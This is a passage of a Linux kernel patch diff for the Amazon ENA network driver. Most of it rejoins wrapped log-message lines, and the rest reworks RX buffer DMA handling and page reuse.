+ 			   aenq_common->group, aenq_common->syndrome, timestamp);
+ 
+ 		/* Handle specific event*/
+@@ -2124,8 +2048,7 @@ void ena_com_aenq_intr_handler(struct ena_com_dev *ena_dev, void *data)
+ 
+ 	/* write the aenq doorbell after all AENQ descriptors were read */
+ 	mb();
+-	writel_relaxed((u32)aenq->head,
+-		       ena_dev->reg_bar + ENA_REGS_AENQ_HEAD_DB_OFF);
++	writel_relaxed((u32)aenq->head, ena_dev->reg_bar + ENA_REGS_AENQ_HEAD_DB_OFF);
+ }
+ 
+ int ena_com_dev_reset(struct ena_com_dev *ena_dev,
+@@ -2137,15 +2060,13 @@ int ena_com_dev_reset(struct ena_com_dev *ena_dev,
+ 	stat = ena_com_reg_bar_read32(ena_dev, ENA_REGS_DEV_STS_OFF);
+ 	cap = ena_com_reg_bar_read32(ena_dev, ENA_REGS_CAPS_OFF);
+ 
+-	if (unlikely((stat == ENA_MMIO_READ_TIMEOUT) ||
+-		     (cap == ENA_MMIO_READ_TIMEOUT))) {
++	if (unlikely((stat == ENA_MMIO_READ_TIMEOUT) || (cap == ENA_MMIO_READ_TIMEOUT))) {
+ 		netdev_err(ena_dev->net_device, "Reg read32 timeout occurred\n");
+ 		return -ETIME;
+ 	}
+ 
+ 	if ((stat & ENA_REGS_DEV_STS_READY_MASK) == 0) {
+-		netdev_err(ena_dev->net_device,
+-			   "Device isn't ready, can't reset device\n");
++		netdev_err(ena_dev->net_device, "Device isn't ready, can't reset device\n");
+ 		return -EINVAL;
+ 	}
+ 
+@@ -2168,8 +2089,7 @@ int ena_com_dev_reset(struct ena_com_dev *ena_dev,
+ 	rc = wait_for_reset_state(ena_dev, timeout,
+ 				  ENA_REGS_DEV_STS_RESET_IN_PROGRESS_MASK);
+ 	if (rc != 0) {
+-		netdev_err(ena_dev->net_device,
+-			   "Reset indication didn't turn on\n");
++		netdev_err(ena_dev->net_device, "Reset indication didn't turn on\n");
+ 		return rc;
+ 	}
+ 
+@@ -2177,8 +2097,7 @@ int ena_com_dev_reset(struct ena_com_dev *ena_dev,
+ 	writel(0, ena_dev->reg_bar + ENA_REGS_DEV_CTL_OFF);
+ 	rc = wait_for_reset_state(ena_dev, timeout, 0);
+ 	if (rc != 0) {
+-		netdev_err(ena_dev->net_device,
+-			   "Reset indication didn't turn off\n");
++		netdev_err(ena_dev->net_device, "Reset indication didn't turn off\n");
+ 		return rc;
+ 	}
+ 
+@@ -2215,8 +2134,7 @@ static int ena_get_dev_stats(struct ena_com_dev *ena_dev,
+ 					     sizeof(*get_resp));
+ 
+ 	if (unlikely(ret))
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to get stats. error: %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to get stats. error: %d\n", ret);
+ 
+ 	return ret;
+ }
+@@ -2228,8 +2146,7 @@ int ena_com_get_eni_stats(struct ena_com_dev *ena_dev,
+ 	int ret;
+ 
+ 	if (!ena_com_get_cap(ena_dev, ENA_ADMIN_ENI_STATS)) {
+-		netdev_err(ena_dev->net_device,
+-			   "Capability %d isn't supported\n",
++		netdev_err(ena_dev->net_device, "Capability %d isn't supported\n",
+ 			   ENA_ADMIN_ENI_STATS);
+ 		return -EOPNOTSUPP;
+ 	}
+@@ -2266,8 +2183,7 @@ int ena_com_set_dev_mtu(struct ena_com_dev *ena_dev, u32 mtu)
+ 	int ret;
+ 
+ 	if (!ena_com_check_supported_feature_id(ena_dev, ENA_ADMIN_MTU)) {
+-		netdev_dbg(ena_dev->net_device, "Feature %d isn't supported\n",
+-			   ENA_ADMIN_MTU);
++		netdev_dbg(ena_dev->net_device, "Feature %d isn't supported\n", ENA_ADMIN_MTU);
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+@@ -2286,8 +2202,7 @@ int ena_com_set_dev_mtu(struct ena_com_dev *ena_dev, u32 mtu)
+ 					    sizeof(resp));
+ 
+ 	if (unlikely(ret))
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to set mtu %d. error: %d\n", mtu, ret);
++		netdev_err(ena_dev->net_device, "Failed to set mtu %d. error: %d\n", mtu, ret);
+ 
+ 	return ret;
+ }
+@@ -2301,8 +2216,7 @@ int ena_com_get_offload_settings(struct ena_com_dev *ena_dev,
+ 	ret = ena_com_get_feature(ena_dev, &resp,
+ 				  ENA_ADMIN_STATELESS_OFFLOAD_CONFIG, 0);
+ 	if (unlikely(ret)) {
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to get offload capabilities %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to get offload capabilities %d\n", ret);
+ 		return ret;
+ 	}
+ 
+@@ -2320,8 +2234,7 @@ int ena_com_set_hash_function(struct ena_com_dev *ena_dev)
+ 	struct ena_admin_get_feat_resp get_resp;
+ 	int ret;
+ 
+-	if (!ena_com_check_supported_feature_id(ena_dev,
+-						ENA_ADMIN_RSS_HASH_FUNCTION)) {
++	if (!ena_com_check_supported_feature_id(ena_dev, ENA_ADMIN_RSS_HASH_FUNCTION)) {
+ 		netdev_dbg(ena_dev->net_device, "Feature %d isn't supported\n",
+ 			   ENA_ADMIN_RSS_HASH_FUNCTION);
+ 		return -EOPNOTSUPP;
+@@ -2334,8 +2247,7 @@ int ena_com_set_hash_function(struct ena_com_dev *ena_dev)
+ 		return ret;
+ 
+ 	if (!(get_resp.u.flow_hash_func.supported_func & BIT(rss->hash_func))) {
+-		netdev_err(ena_dev->net_device,
+-			   "Func hash %d isn't supported by device, abort\n",
++		netdev_err(ena_dev->net_device, "Func hash %d isn't supported by device, abort\n",
+ 			   rss->hash_func);
+ 		return -EOPNOTSUPP;
+ 	}
+@@ -2365,8 +2277,7 @@ int ena_com_set_hash_function(struct ena_com_dev *ena_dev)
+ 					    (struct ena_admin_acq_entry *)&resp,
+ 					    sizeof(resp));
+ 	if (unlikely(ret)) {
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to set hash function %d. error: %d\n",
++		netdev_err(ena_dev->net_device, "Failed to set hash function %d. error: %d\n",
+ 			   rss->hash_func, ret);
+ 		return -EINVAL;
+ 	}
+@@ -2398,16 +2309,15 @@ int ena_com_fill_hash_function(struct ena_com_dev *ena_dev,
+ 		return rc;
+ 
+ 	if (!(BIT(func) & get_resp.u.flow_hash_func.supported_func)) {
+-		netdev_err(ena_dev->net_device,
+-			   "Flow hash function %d isn't supported\n", func);
++		netdev_err(ena_dev->net_device, "Flow hash function %d isn't supported\n", func);
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+ 	if ((func == ENA_ADMIN_TOEPLITZ) && key) {
+ 		if (key_len != sizeof(hash_key->key)) {
+ 			netdev_err(ena_dev->net_device,
+-				   "key len (%u) doesn't equal the supported size (%zu)\n",
+-				   key_len, sizeof(hash_key->key));
++				   "key len (%u) doesn't equal the supported size (%zu)\n", key_len,
++				   sizeof(hash_key->key));
+ 			return -EINVAL;
+ 		}
+ 		memcpy(hash_key->key, key, key_len);
+@@ -2495,8 +2405,7 @@ int ena_com_set_hash_ctrl(struct ena_com_dev *ena_dev)
+ 	struct ena_admin_set_feat_resp resp;
+ 	int ret;
+ 
+-	if (!ena_com_check_supported_feature_id(ena_dev,
+-						ENA_ADMIN_RSS_HASH_INPUT)) {
++	if (!ena_com_check_supported_feature_id(ena_dev, ENA_ADMIN_RSS_HASH_INPUT)) {
+ 		netdev_dbg(ena_dev->net_device, "Feature %d isn't supported\n",
+ 			   ENA_ADMIN_RSS_HASH_INPUT);
+ 		return -EOPNOTSUPP;
+@@ -2527,8 +2436,7 @@ int ena_com_set_hash_ctrl(struct ena_com_dev *ena_dev)
+ 					    (struct ena_admin_acq_entry *)&resp,
+ 					    sizeof(resp));
+ 	if (unlikely(ret))
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to set hash input. error: %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to set hash input. error: %d\n", ret);
+ 
+ 	return ret;
+ }
+@@ -2605,8 +2513,7 @@ int ena_com_fill_hash_ctrl(struct ena_com_dev *ena_dev,
+ 	int rc;
+ 
+ 	if (proto >= ENA_ADMIN_RSS_PROTO_NUM) {
+-		netdev_err(ena_dev->net_device, "Invalid proto num (%u)\n",
+-			   proto);
++		netdev_err(ena_dev->net_device, "Invalid proto num (%u)\n", proto);
+ 		return -EINVAL;
+ 	}
+ 
+@@ -2658,8 +2565,7 @@ int ena_com_indirect_table_set(struct ena_com_dev *ena_dev)
+ 	struct ena_admin_set_feat_resp resp;
+ 	int ret;
+ 
+-	if (!ena_com_check_supported_feature_id(
+-		    ena_dev, ENA_ADMIN_RSS_INDIRECTION_TABLE_CONFIG)) {
++	if (!ena_com_check_supported_feature_id(ena_dev, ENA_ADMIN_RSS_INDIRECTION_TABLE_CONFIG)) {
+ 		netdev_dbg(ena_dev->net_device, "Feature %d isn't supported\n",
+ 			   ENA_ADMIN_RSS_INDIRECTION_TABLE_CONFIG);
+ 		return -EOPNOTSUPP;
+@@ -2699,8 +2605,7 @@ int ena_com_indirect_table_set(struct ena_com_dev *ena_dev)
+ 					    sizeof(resp));
+ 
+ 	if (unlikely(ret))
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to set indirect table. error: %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to set indirect table. error: %d\n", ret);
+ 
+ 	return ret;
+ }
+@@ -2779,9 +2684,8 @@ int ena_com_allocate_host_info(struct ena_com_dev *ena_dev)
+ {
+ 	struct ena_host_attribute *host_attr = &ena_dev->host_attr;
+ 
+-	host_attr->host_info =
+-		dma_alloc_coherent(ena_dev->dmadev, SZ_4K,
+-				   &host_attr->host_info_dma_addr, GFP_KERNEL);
++	host_attr->host_info = dma_alloc_coherent(ena_dev->dmadev, SZ_4K,
++						  &host_attr->host_info_dma_addr, GFP_KERNEL);
+ 	if (unlikely(!host_attr->host_info))
+ 		return -ENOMEM;
+ 
+@@ -2827,8 +2731,7 @@ void ena_com_delete_debug_area(struct ena_com_dev *ena_dev)
+ 
+ 	if (host_attr->debug_area_virt_addr) {
+ 		dma_free_coherent(ena_dev->dmadev, host_attr->debug_area_size,
+-				  host_attr->debug_area_virt_addr,
+-				  host_attr->debug_area_dma_addr);
++				  host_attr->debug_area_virt_addr, host_attr->debug_area_dma_addr);
+ 		host_attr->debug_area_virt_addr = NULL;
+ 	}
+ }
+@@ -2877,8 +2780,7 @@ int ena_com_set_host_attributes(struct ena_com_dev *ena_dev)
+ 					    sizeof(resp));
+ 
+ 	if (unlikely(ret))
+-		netdev_err(ena_dev->net_device,
+-			   "Failed to set host attributes: %d\n", ret);
++		netdev_err(ena_dev->net_device, "Failed to set host attributes: %d\n", ret);
+ 
+ 	return ret;
+ }
+@@ -2896,8 +2798,7 @@ static int ena_com_update_nonadaptive_moderation_interval(struct ena_com_dev *en
+ 							  u32 *intr_moder_interval)
+ {
+ 	if (!intr_delay_resolution) {
+-		netdev_err(ena_dev->net_device,
+-			   "Illegal interrupt delay granularity value\n");
++		netdev_err(ena_dev->net_device, "Illegal interrupt delay granularity value\n");
+ 		return -EFAULT;
+ 	}
+ 
+@@ -2935,14 +2836,12 @@ int ena_com_init_interrupt_moderation(struct ena_com_dev *ena_dev)
+ 
+ 	if (rc) {
+ 		if (rc == -EOPNOTSUPP) {
+-			netdev_dbg(ena_dev->net_device,
+-				   "Feature %d isn't supported\n",
++			netdev_dbg(ena_dev->net_device, "Feature %d isn't supported\n",
+ 				   ENA_ADMIN_INTERRUPT_MODERATION);
+ 			rc = 0;
+ 		} else {
+ 			netdev_err(ena_dev->net_device,
+-				   "Failed to get interrupt moderation admin cmd. rc: %d\n",
+-				   rc);
++				   "Failed to get interrupt moderation admin cmd. rc: %d\n", rc);
+ 		}
+ 
+ 		/* no moderation supported, disable adaptive support */
+@@ -2990,8 +2889,7 @@ int ena_com_config_dev_mode(struct ena_com_dev *ena_dev,
+ 		(llq_info->descs_num_before_header * sizeof(struct ena_eth_io_tx_desc));
+ 
+ 	if (unlikely(ena_dev->tx_max_header_size == 0)) {
+-		netdev_err(ena_dev->net_device,
+-			   "The size of the LLQ entry is smaller than needed\n");
++		netdev_err(ena_dev->net_device, "The size of the LLQ entry is smaller than needed\n");
+ 		return -EINVAL;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/amazon/ena/ena_eth_com.c b/drivers/net/ethernet/amazon/ena/ena_eth_com.c
+index f9f886289b970..933e619b3a313 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_eth_com.c
++++ b/drivers/net/ethernet/amazon/ena/ena_eth_com.c
+@@ -18,8 +18,7 @@ static struct ena_eth_io_rx_cdesc_base *ena_com_get_next_rx_cdesc(
+ 	cdesc = (struct ena_eth_io_rx_cdesc_base *)(io_cq->cdesc_addr.virt_addr
+ 			+ (head_masked * io_cq->cdesc_entry_size_in_bytes));
+ 
+-	desc_phase = (READ_ONCE(cdesc->status) &
+-		      ENA_ETH_IO_RX_CDESC_BASE_PHASE_MASK) >>
++	desc_phase = (READ_ONCE(cdesc->status) & ENA_ETH_IO_RX_CDESC_BASE_PHASE_MASK) >>
+ 		     ENA_ETH_IO_RX_CDESC_BASE_PHASE_SHIFT;
+ 
+ 	if (desc_phase != expected_phase)
+@@ -65,8 +64,8 @@ static int ena_com_write_bounce_buffer_to_dev(struct ena_com_io_sq *io_sq,
+ 
+ 		io_sq->entries_in_tx_burst_left--;
+ 		netdev_dbg(ena_com_io_sq_to_ena_dev(io_sq)->net_device,
+-			   "Decreasing entries_in_tx_burst_left of queue %d to %d\n",
+-			   io_sq->qid, io_sq->entries_in_tx_burst_left);
++			   "Decreasing entries_in_tx_burst_left of queue %d to %d\n", io_sq->qid,
++			   io_sq->entries_in_tx_burst_left);
+ 	}
+ 
+ 	/* Make sure everything was written into the bounce buffer before
+@@ -75,8 +74,8 @@ static int ena_com_write_bounce_buffer_to_dev(struct ena_com_io_sq *io_sq,
+ 	wmb();
+ 
+ 	/* The line is completed. Copy it to dev */
+-	__iowrite64_copy(io_sq->desc_addr.pbuf_dev_addr + dst_offset,
+-			 bounce_buffer, (llq_info->desc_list_entry_size) / 8);
++	__iowrite64_copy(io_sq->desc_addr.pbuf_dev_addr + dst_offset, bounce_buffer,
++			 (llq_info->desc_list_entry_size) / 8);
+ 
+ 	io_sq->tail++;
+ 
+@@ -102,16 +101,14 @@ static int ena_com_write_header_to_bounce(struct ena_com_io_sq *io_sq,
+ 	header_offset =
+ 		llq_info->descs_num_before_header * io_sq->desc_entry_size;
+ 
+-	if (unlikely((header_offset + header_len) >
+-		     llq_info->desc_list_entry_size)) {
++	if (unlikely((header_offset + header_len) > llq_info->desc_list_entry_size)) {
+ 		netdev_err(ena_com_io_sq_to_ena_dev(io_sq)->net_device,
+ 			   "Trying to write header larger than llq entry can accommodate\n");
+ 		return -EFAULT;
+ 	}
+ 
+ 	if (unlikely(!bounce_buffer)) {
+-		netdev_err(ena_com_io_sq_to_ena_dev(io_sq)->net_device,
+-			   "Bounce buffer is NULL\n");
++		netdev_err(ena_com_io_sq_to_ena_dev(io_sq)->net_device, "Bounce buffer is NULL\n");
+ 		return -EFAULT;
+ 	}
+ 
+@@ -129,8 +126,7 @@ static void *get_sq_desc_llq(struct ena_com_io_sq *io_sq)
+ 	bounce_buffer = pkt_ctrl->curr_bounce_buf;
+ 
+ 	if (unlikely(!bounce_buffer)) {
+-		netdev_err(ena_com_io_sq_to_ena_dev(io_sq)->net_device,
+-			   "Bounce buffer is NULL\n");
++		netdev_err(ena_com_io_sq_to_ena_dev(io_sq)->net_device, "Bounce buffer is NULL\n");
+ 		return NULL;
+ 	}
+ 
+@@ -247,8 +243,7 @@ static u16 ena_com_cdesc_rx_pkt_get(struct ena_com_io_cq *io_cq,
+ 
+ 		ena_com_cq_inc_head(io_cq);
+ 		count++;
+-		last = (READ_ONCE(cdesc->status) &
+-			ENA_ETH_IO_RX_CDESC_BASE_LAST_MASK) >>
++		last = (READ_ONCE(cdesc->status) & ENA_ETH_IO_RX_CDESC_BASE_LAST_MASK) >>
+ 		       ENA_ETH_IO_RX_CDESC_BASE_LAST_SHIFT;
+ 	} while (!last);
+ 
+@@ -369,9 +364,8 @@ static void ena_com_rx_set_flags(struct ena_com_io_cq *io_cq,
+ 
+ 	netdev_dbg(ena_com_io_cq_to_ena_dev(io_cq)->net_device,
+ 		   "l3_proto %d l4_proto %d l3_csum_err %d l4_csum_err %d hash %d frag %d cdesc_status %x\n",
+-		   ena_rx_ctx->l3_proto, ena_rx_ctx->l4_proto,
+-		   ena_rx_ctx->l3_csum_err, ena_rx_ctx->l4_csum_err,
+-		   ena_rx_ctx->hash, ena_rx_ctx->frag, cdesc->status);
++		   ena_rx_ctx->l3_proto, ena_rx_ctx->l4_proto, ena_rx_ctx->l3_csum_err,
++		   ena_rx_ctx->l4_csum_err, ena_rx_ctx->hash, ena_rx_ctx->frag, cdesc->status);
+ }
+ 
+ /*****************************************************************************/
+@@ -403,13 +397,12 @@ int ena_com_prepare_tx(struct ena_com_io_sq *io_sq,
+ 
+ 	if (unlikely(header_len > io_sq->tx_max_header_size)) {
+ 		netdev_err(ena_com_io_sq_to_ena_dev(io_sq)->net_device,
+-			   "Header size is too large %d max header: %d\n",
+-			   header_len, io_sq->tx_max_header_size);
++			   "Header size is too large %d max header: %d\n", header_len,
++			   io_sq->tx_max_header_size);
+ 		return -EINVAL;
+ 	}
+ 
+-	if (unlikely(io_sq->mem_queue_type == ENA_ADMIN_PLACEMENT_POLICY_DEV &&
+-		     !buffer_to_push)) {
++	if (unlikely(io_sq->mem_queue_type == ENA_ADMIN_PLACEMENT_POLICY_DEV && !buffer_to_push)) {
+ 		netdev_err(ena_com_io_sq_to_ena_dev(io_sq)->net_device,
+ 			   "Push header wasn't provided in LLQ mode\n");
+ 		return -EINVAL;
+@@ -556,13 +549,11 @@ int ena_com_rx_pkt(struct ena_com_io_cq *io_cq,
+ 	}
+ 
+ 	netdev_dbg(ena_com_io_cq_to_ena_dev(io_cq)->net_device,
+-		   "Fetch rx packet: queue %d completed desc: %d\n", io_cq->qid,
+-		   nb_hw_desc);
++		   "Fetch rx packet: queue %d completed desc: %d\n", io_cq->qid, nb_hw_desc);
+ 
+ 	if (unlikely(nb_hw_desc > ena_rx_ctx->max_bufs)) {
+ 		netdev_err(ena_com_io_cq_to_ena_dev(io_cq)->net_device,
+-			   "Too many RX cdescs (%d) > MAX(%d)\n", nb_hw_desc,
+-			   ena_rx_ctx->max_bufs);
++			   "Too many RX cdescs (%d) > MAX(%d)\n", nb_hw_desc, ena_rx_ctx->max_bufs);
+ 		return -ENOSPC;
+ 	}
+ 
+@@ -586,8 +577,8 @@ int ena_com_rx_pkt(struct ena_com_io_cq *io_cq,
+ 	io_sq->next_to_comp += nb_hw_desc;
+ 
+ 	netdev_dbg(ena_com_io_cq_to_ena_dev(io_cq)->net_device,
+-		   "[%s][QID#%d] Updating SQ head to: %d\n", __func__,
+-		   io_sq->qid, io_sq->next_to_comp);
++		   "[%s][QID#%d] Updating SQ head to: %d\n", __func__, io_sq->qid,
++		   io_sq->next_to_comp);
+ 
+ 	/* Get rx flags from the last pkt */
+ 	ena_com_rx_set_flags(io_cq, ena_rx_ctx, cdesc);
+@@ -624,8 +615,8 @@ int ena_com_add_single_rx_desc(struct ena_com_io_sq *io_sq,
+ 	desc->req_id = req_id;
+ 
+ 	netdev_dbg(ena_com_io_sq_to_ena_dev(io_sq)->net_device,
+-		   "[%s] Adding single RX desc, Queue: %u, req_id: %u\n",
+-		   __func__, io_sq->qid, req_id);
++		   "[%s] Adding single RX desc, Queue: %u, req_id: %u\n", __func__, io_sq->qid,
++		   req_id);
+ 
+ 	desc->buff_addr_lo = (u32)ena_buf->paddr;
+ 	desc->buff_addr_hi =
+diff --git a/drivers/net/ethernet/amazon/ena/ena_eth_com.h b/drivers/net/ethernet/amazon/ena/ena_eth_com.h
+index 689313ee25a80..07029eee78caf 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_eth_com.h
++++ b/drivers/net/ethernet/amazon/ena/ena_eth_com.h
+@@ -141,8 +141,8 @@ static inline bool ena_com_is_doorbell_needed(struct ena_com_io_sq *io_sq,
+ 	}
+ 
+ 	netdev_dbg(ena_com_io_sq_to_ena_dev(io_sq)->net_device,
+-		   "Queue: %d num_descs: %d num_entries_needed: %d\n",
+-		   io_sq->qid, num_descs, num_entries_needed);
++		   "Queue: %d num_descs: %d num_entries_needed: %d\n", io_sq->qid, num_descs,
++		   num_entries_needed);
+ 
+ 	return num_entries_needed > io_sq->entries_in_tx_burst_left;
+ }
+@@ -153,15 +153,14 @@ static inline int ena_com_write_sq_doorbell(struct ena_com_io_sq *io_sq)
+ 	u16 tail = io_sq->tail;
+ 
+ 	netdev_dbg(ena_com_io_sq_to_ena_dev(io_sq)->net_device,
+-		   "Write submission queue doorbell for queue: %d tail: %d\n",
+-		   io_sq->qid, tail);
++		   "Write submission queue doorbell for queue: %d tail: %d\n", io_sq->qid, tail);
+ 
+ 	writel(tail, io_sq->db_addr);
+ 
+ 	if (is_llq_max_tx_burst_exists(io_sq)) {
+ 		netdev_dbg(ena_com_io_sq_to_ena_dev(io_sq)->net_device,
+-			   "Reset available entries in tx burst for queue %d to %d\n",
+-			   io_sq->qid, max_entries_in_tx_burst);
++			   "Reset available entries in tx burst for queue %d to %d\n", io_sq->qid,
++			   max_entries_in_tx_burst);
+ 		io_sq->entries_in_tx_burst_left = max_entries_in_tx_burst;
+ 	}
+ 
+@@ -244,8 +243,8 @@ static inline int ena_com_tx_comp_req_id_get(struct ena_com_io_cq *io_cq,
+ 
+ 	*req_id = READ_ONCE(cdesc->req_id);
+ 	if (unlikely(*req_id >= io_cq->q_depth)) {
+-		netdev_err(ena_com_io_cq_to_ena_dev(io_cq)->net_device,
+-			   "Invalid req id %d\n", cdesc->req_id);
++		netdev_err(ena_com_io_cq_to_ena_dev(io_cq)->net_device, "Invalid req id %d\n",
++			   cdesc->req_id);
+ 		return -EINVAL;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.c b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+index 5e37b18ac3adf..77fa4c35f2331 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_netdev.c
++++ b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+@@ -164,11 +164,9 @@ static int ena_xmit_common(struct net_device *dev,
+ 	if (unlikely(rc)) {
+ 		netif_err(adapter, tx_queued, dev,
+ 			  "Failed to prepare tx bufs\n");
+-		ena_increase_stat(&ring->tx_stats.prepare_ctx_err, 1,
+-				  &ring->syncp);
++		ena_increase_stat(&ring->tx_stats.prepare_ctx_err, 1, &ring->syncp);
+ 		if (rc != -ENOMEM)
+-			ena_reset_device(adapter,
+-					 ENA_REGS_RESET_DRIVER_INVALID_STATE);
++			ena_reset_device(adapter, ENA_REGS_RESET_DRIVER_INVALID_STATE);
+ 		return rc;
+ 	}
+ 
+@@ -992,8 +990,7 @@ static struct page *ena_alloc_map_page(struct ena_ring *rx_ring,
+ 	 */
+ 	page = dev_alloc_page();
+ 	if (!page) {
+-		ena_increase_stat(&rx_ring->rx_stats.page_alloc_fail, 1,
+-				  &rx_ring->syncp);
++		ena_increase_stat(&rx_ring->rx_stats.page_alloc_fail, 1, &rx_ring->syncp);
+ 		return ERR_PTR(-ENOSPC);
+ 	}
+ 
+@@ -1022,7 +1019,7 @@ static int ena_alloc_rx_buffer(struct ena_ring *rx_ring,
+ 	int tailroom;
+ 
+ 	/* restore page offset value in case it has been changed by device */
+-	rx_info->page_offset = headroom;
++	rx_info->buf_offset = headroom;
+ 
+ 	/* if previous allocated page is not used */
+ 	if (unlikely(rx_info->page))
+@@ -1039,6 +1036,8 @@ static int ena_alloc_rx_buffer(struct ena_ring *rx_ring,
+ 	tailroom = SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+ 
+ 	rx_info->page = page;
++	rx_info->dma_addr = dma;
++	rx_info->page_offset = 0;
+ 	ena_buf = &rx_info->ena_buf;
+ 	ena_buf->paddr = dma + headroom;
+ 	ena_buf->len = ENA_PAGE_SIZE - headroom - tailroom;
+@@ -1046,14 +1045,12 @@ static int ena_alloc_rx_buffer(struct ena_ring *rx_ring,
+ 	return 0;
+ }
+ 
+-static void ena_unmap_rx_buff(struct ena_ring *rx_ring,
+-			      struct ena_rx_buffer *rx_info)
++static void ena_unmap_rx_buff_attrs(struct ena_ring *rx_ring,
++				    struct ena_rx_buffer *rx_info,
++				    unsigned long attrs)
+ {
+-	struct ena_com_buf *ena_buf = &rx_info->ena_buf;
+-
+-	dma_unmap_page(rx_ring->dev, ena_buf->paddr - rx_ring->rx_headroom,
+-		       ENA_PAGE_SIZE,
+-		       DMA_BIDIRECTIONAL);
++	dma_unmap_page_attrs(rx_ring->dev, rx_info->dma_addr, ENA_PAGE_SIZE, DMA_BIDIRECTIONAL,
++			     attrs);
+ }
+ 
+ static void ena_free_rx_page(struct ena_ring *rx_ring,
+@@ -1067,7 +1064,7 @@ static void ena_free_rx_page(struct ena_ring *rx_ring,
+ 		return;
+ 	}
+ 
+-	ena_unmap_rx_buff(rx_ring, rx_info);
++	ena_unmap_rx_buff_attrs(rx_ring, rx_info, 0);
+ 
+ 	__free_page(page);
+ 	rx_info->page = NULL;
+@@ -1344,8 +1341,7 @@ static int ena_clean_tx_irq(struct ena_ring *tx_ring, u32 budget)
+ 						&req_id);
+ 		if (rc) {
+ 			if (unlikely(rc == -EINVAL))
+-				handle_invalid_req_id(tx_ring, req_id, NULL,
+-						      false);
++				handle_invalid_req_id(tx_ring, req_id, NULL, false);
+ 			break;
+ 		}
+ 
+@@ -1413,14 +1409,14 @@ static int ena_clean_tx_irq(struct ena_ring *tx_ring, u32 budget)
+ 	return tx_pkts;
+ }
+ 
+-static struct sk_buff *ena_alloc_skb(struct ena_ring *rx_ring, void *first_frag)
++static struct sk_buff *ena_alloc_skb(struct ena_ring *rx_ring, void *first_frag, u16 len)
+ {
+ 	struct sk_buff *skb;
+ 
+ 	if (!first_frag)
+-		skb = napi_alloc_skb(rx_ring->napi, rx_ring->rx_copybreak);
++		skb = napi_alloc_skb(rx_ring->napi, len);
+ 	else
+-		skb = napi_build_skb(first_frag, ENA_PAGE_SIZE);
++		skb = napi_build_skb(first_frag, len);
+ 
+ 	if (unlikely(!skb)) {
+ 		ena_increase_stat(&rx_ring->rx_stats.skb_alloc_fail, 1,
+@@ -1429,24 +1425,47 @@ static struct sk_buff *ena_alloc_skb(struct ena_ring *rx_ring, void *first_frag)
+ 		netif_dbg(rx_ring->adapter, rx_err, rx_ring->netdev,
+ 			  "Failed to allocate skb. first_frag %s\n",
+ 			  first_frag ? "provided" : "not provided");
+-		return NULL;
+ 	}
+ 
+ 	return skb;
+ }
+ 
++static bool ena_try_rx_buf_page_reuse(struct ena_rx_buffer *rx_info, u16 buf_len,
++				      u16 len, int pkt_offset)
++{
++	struct ena_com_buf *ena_buf = &rx_info->ena_buf;
++
++	/* More than ENA_MIN_RX_BUF_SIZE left in the reused buffer
++	 * for data + headroom + tailroom.
++	 */
++	if (SKB_DATA_ALIGN(len + pkt_offset) + ENA_MIN_RX_BUF_SIZE <= ena_buf->len) {
++		page_ref_inc(rx_info->page);
++		rx_info->page_offset += buf_len;
++		ena_buf->paddr += buf_len;
++		ena_buf->len -= buf_len;
++		return true;
++	}
++
++	return false;
++}
++
+ static struct sk_buff *ena_rx_skb(struct ena_ring *rx_ring,
+ 				  struct ena_com_rx_buf_info *ena_bufs,
+ 				  u32 descs,
+ 				  u16 *next_to_clean)
+ {
++	int tailroom = SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
++	bool is_xdp_loaded = ena_xdp_present_ring(rx_ring);
+ 	struct ena_rx_buffer *rx_info;
+ 	struct ena_adapter *adapter;
++	int page_offset, pkt_offset;
++	dma_addr_t pre_reuse_paddr;
+ 	u16 len, req_id, buf = 0;
++	bool reuse_rx_buf_page;
+ 	struct sk_buff *skb;
+-	void *page_addr;
+-	u32 page_offset;
+-	void *data_addr;
++	void *buf_addr;
++	int buf_offset;
++	u16 buf_len;
+ 
+ 	len = ena_bufs[buf].len;
+ 	req_id = ena_bufs[buf].req_id;
+@@ -1466,34 +1485,25 @@ static struct sk_buff *ena_rx_skb(struct ena_ring *rx_ring,
+ 		  "rx_info %p page %p\n",
+ 		  rx_info, rx_info->page);
+ 
+-	/* save virt address of first buffer */
+-	page_addr = page_address(rx_info->page);
++	buf_offset = rx_info->buf_offset;
++	pkt_offset = buf_offset - rx_ring->rx_headroom;
+ 	page_offset = rx_info->page_offset;
+-	data_addr = page_addr + page_offset;
+-
+-	prefetch(data_addr);
++	buf_addr = page_address(rx_info->page) + page_offset;
+ 
+ 	if (len <= rx_ring->rx_copybreak) {
+-		skb = ena_alloc_skb(rx_ring, NULL);
++		skb = ena_alloc_skb(rx_ring, NULL, len);
+ 		if (unlikely(!skb))
+ 			return NULL;
+ 
+-		netif_dbg(rx_ring->adapter, rx_status, rx_ring->netdev,
+-			  "RX allocated small packet. len %d. data_len %d\n",
+-			  skb->len, skb->data_len);
+-
+-		/* sync this buffer for CPU use */
+-		dma_sync_single_for_cpu(rx_ring->dev,
+-					dma_unmap_addr(&rx_info->ena_buf, paddr),
+-					len,
+-					DMA_FROM_DEVICE);
+-		skb_copy_to_linear_data(skb, data_addr, len);
++		skb_copy_to_linear_data(skb, buf_addr + buf_offset, len);
+ 		dma_sync_single_for_device(rx_ring->dev,
+-					   dma_unmap_addr(&rx_info->ena_buf, paddr),
++					   dma_unmap_addr(&rx_info->ena_buf, paddr) + pkt_offset,
+ 					   len,
+ 					   DMA_FROM_DEVICE);
+ 
+ 		skb_put(skb, len);
++		netif_dbg(rx_ring->adapter, rx_status, rx_ring->netdev,
